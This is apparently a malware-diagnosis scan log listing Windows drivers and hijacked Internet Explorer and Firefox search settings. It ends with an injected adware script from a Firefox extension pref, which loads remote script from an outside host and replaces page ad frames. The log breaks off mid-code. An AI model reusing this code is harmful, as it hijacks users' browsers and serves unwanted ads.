(Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)DRV:[b]64bit:[/b] - [2013.07.17 11:59:00 | 000,021,360 | ---- | M] (Acer Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LMDriver.sys -- (LMDriver)DRV:[b]64bit:[/b] - [2013.07.17 11:59:00 | 000,014,680 | ---- | M] (Acer Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\RadioShim.sys -- (RadioShim)DRV:[b]64bit:[/b] - [2013.06.18 16:45:14 | 000,425,984 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\k57nd60a.sys -- (k57nd60a)DRV:[b]64bit:[/b] - [2013.04.12 16:34:48 | 000,015,456 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\klpd.sys -- (klpd) [color=#E56717]========== Standard Registry (All) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = [binary data]IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Extensions Off Page = about:NoAdd-onsIE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\System32\blank.htmIE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page =

http://go.microsoft.com/fwlink/?LinkId=54896IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Security Risk Page = about:SecurityRiskIE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://start.mysearchdial.com/?f=1&a=frg_14_12_ff&cd=2XzuyEtN2Y1L1QzutD0CyDyE0AyD0F0EtDyEzztCyByD0FtAtN0D0Tzu0SzztDyBtN1L2XzutBtFtCzztFtBtFtDtN1L1CzutCyEtDtAtDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StCyE0F0FyD0FtBtCtGtA0EtAyEtGyDtDyByBtGyCtB0D0DtGtC0D0DtAtD0EyE0F0ByCtDtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0DyC0DtByB0DtBtGyEyEzzyEtGtBzzyE0AtG0Czy0D0DtGyE0Fzy0A0DyCyBtDyEtDyEtD2Q&cr=669422032&ir=IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {C4C8CE72-4443-4ABE-9245-AE68C2CE45BE}IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ACJBIE:[b]64bit:[/b] - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-search.net/search?sid=476&aid=114&itype=a&ver=12627&tm=292&src=ds&p={searchTerms}IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C}: "URL"= http://chfr.yhs4.search.yahoo.com/yhs/search?hspart=acer&hsimp=yhs-acer_001&p={searchTerms}IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{C4C8CE72-4443-4ABE-9245-AE68C2CE45BE}: "URL" = http://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=frg_14_12_ff&cd=2XzuyEtN2Y1L1QzutD0CyDyE0AyD0F0EtDyEzztCyByD0FtAtN0D0Tzu0SzztDyBtN1L2XzutBtFtCzztFtBtFtDtN1L1CzutCyEtDtAtDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StCyE0F0FyD0FtBtCtGtA0EtAyEtGyDtDyByBtGyCtB0D0DtGtC0D0DtAtD0EyE0F0ByCtDtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0DyC0DtByB0DtBtGyEyEzzyEtGtBzzyE0AtG0Czy0D0DtGyE0Fzy0A0DyCyBtDyEtDyEtD2Q&cr=669422032&ir=IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = [binary data]IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Extensions Off Page = about:NoAdd-onsIE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htmIE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Security Risk Page = about:SecurityRiskIE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://start.mysearchdial.com/?f=1&a=frg_14_12_ff&cd=2XzuyEtN2Y1L1QzutD0CyDyE0AyD0F0EtDyEzztCyByD0FtAtN0D0Tzu0SzztDyBtN1L2XzutBtFtCzztFtBtFtDtN1L1CzutCyEtDtAtDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StCyE0F0FyD0FtBtCtGtA0EtAyEtGyDtDyByBtGyCtB0D0DtGtC0D0DtAtD0EyE0F0ByCtDtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0DyC0DtByB0DtBtGyEyEzzyEtGtBzzyE0AtG0Czy0D0DtGyE0Fzy0A0DyCyBtDyEtDyEtD2Q&cr=669422032&ir=IE - HKLM\..\SearchScopes,DefaultScope = {C4C8CE72-4443-4ABE-9245-AE68C2CE45BE}IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-search.net/search?sid=476&aid=114&itype=a&ver=12627&tm=292&src=ds&p={searchTerms}

IE - HKLM\..\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C}: "URL" = http://chfr.yhs4.search.yahoo.com/yhs/search?hspart=acer&hsimp=yhs-acer_001&p={searchTerms}IE - HKLM\..\SearchScopes\{C4C8CE72-4443-4ABE-9245-AE68C2CE45BE}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ACJB IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://acer13.msn.com/?pc=ACJBIE - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\system32\blank.htmIE - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896IE - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.trovigo.com/?gd=&ctid=CT3314932&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=5&UP=SPAF4781A9-5B8D-450B-A031-BD987D08F284&SSPV=IE - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001\..\URLSearchHook: {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - C:\Windows\SysWOW64\ieframe.dll (Microsoft Corporation)IE - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001\..\SearchScopes,DefaultScope = IE - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-search.net/search?sid=476&aid=114&itype=a&ver=12627&tm=292&src=ds&p={searchTerms}IE - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001\..\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C}: "URL" = http://chfr.yhs4.search.yahoo.com/yhs/search?hspart=acer&hsimp=yhs-acer_001&p={searchTerms}IE - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.defaultenginename: "Yahoo MSD"FF - prefs.js..browser.search.order.1: "default-search.net"FF - prefs.js..browser.search.selectedEngine: "Yahoo MSD"FF - prefs.js..browser.search.useDBForOrder: trueFF - prefs.js..browser.startup.homepage: "about:home"FF - prefs.js..extensions.HHbVyN0t_aFO.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||

url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"onduit\")>-1||url.match(/bing.com[^p]+pc=.+/)||url.match(/search.yahoo.com.+hspart=.+/)||url.indexOf(\"search.imesh\")>-1||url.indexOf(\"search.searchcore\")>-1||url.indexOf(\"searchnu.com\")>-1||url.indexOf(\"searchqu.com\")>-1||url.indexOf(\"shareazaweb\")>-1||url.indexOf(\"searchgby.com\")>-1||url.indexOf(\"mysearchresults.com\")>-1||url.indexOf(\"searchya.com\")>-1||url.indexOf(\"searchgol.com\")>-1||url.indexOf(\"trovi.com\")>-1||url.indexOf(\"search.ask\")>-1||url.indexOf(\"mywebsearch.com\")>-1||url.indexOf(\"search-results.com\")>-1||url.indexOf(\"mysearch.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"http://sporty-glow.com/\")>-1||url.indexOf(\"http://game-trek.net/\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1){return}}catch(e){};if(Math.ceil(Math.random()*40)==1){(function(){var a = \"microsoft msn youtube.com ninemsnyahoo maktoob rivals amazon jeuxvideo xbox flickr outlook microsoftstore alltheweb intonow overture tumblr live facebook embedr altavista ashleyfurniturehomestore reddit tripadvisor rightmedia craigslist sprint mozilla att omg.com apple americanexpress\".split(\" \");for(var i=0;i<a.length;i++) if(window.self.location.hostname.indexOf(a[i])>-1){return};try{if(typeof(localStorage)!='undefined' && (window.self.location.hostname.indexOf('adnxs.com')>-1 || window.self.location.hostname.indexOf('doubleclick')>-1 || window.self.location.hostname.indexOf('cloudfront')>-1)){localStorage.setItem(\"xhxg4sk42hsba\",\"9\")}}catch(e){};var _wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1==b){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(c)}catch(f){}}setTimeout(function()

{_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch(b){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt(c))&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['velis_adr6',203],['dsnr_dasa2',305],['dsnr_nntbr2',305],['cpx_cybersoft3_new',7965],['mari_gen_E',203],['matomy_adj48_new',1019]],[['mari_strm_E',50],['matomy_strm53',9950]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('wLXWXSer=')>-1|| _zyad.location.indexOf('adk2.co')>-1||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"servedby.adsplats.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=506761')>-1|| _zyad.location.indexOf('=564350')>-1||_zyad.location.indexOf('PT1311')>-1||

_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch(c){}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting fuck gangbang orgy gay nude tits tranny blowjob handjob masturbat busty slut joder horny mamada polla cock pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s14740979085333243415\"))continue}catch(c){try{if(d[i].getAttribute(\"s14740979085333243415\"))continue}catch(e){}};try{if(d[i].src.indexOf('=506761')>-1||d[i].src.indexOf('=564350')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/âp\\d+$/))){try{d[i].setAttribute(\"s14740979085333243415\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a[b].ifr,a[b].size);b++;a&&a[b]&&\"function\"==typeof a[b].func&&setTimeout(function(){a[b].func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){vard=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'wLXWXSer=' +

properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body> \\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body> </body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s14740979085333243415\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{velis_adr6:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2703082\",\"300x250\":\"2703083\",\"120x600\":\"2703084\",\"160x600\":\"2703085\",\"468x60\":\"2703086\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1469,size]);}}catch(e){return !1;}},dsnr_dasa2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024342&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1596,size]);}}catch(e){return !1;}},dsnr_nntbr2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024616&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1605,size]);}}catch(e){return !1;}},cpx_cybersoft3_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=3294776&size='+size+'&referrer=${REFERER_URL}', (atp?atp:1), [1721,size]);}}catch(e){return !1;}},mari_gen_E:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"3168511\",\"300x250\":\"3168512\",\"160x600\":\"3168513\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1693,size]);}}catch(e){return !1;}},matomy_adj48_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223120&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1722,size]);}}catch(e){return !1;}},mari_strm_E:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var

atp=false;if(size=='120x60')return;arr={\"728x90\":\"3168702\",\"300x250\":\"3168703\",\"160x600\":\"3168704\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1709,size]);}}catch(e){return !1;}},matomy_strm53:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223135&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1720,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type='+size+'&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + 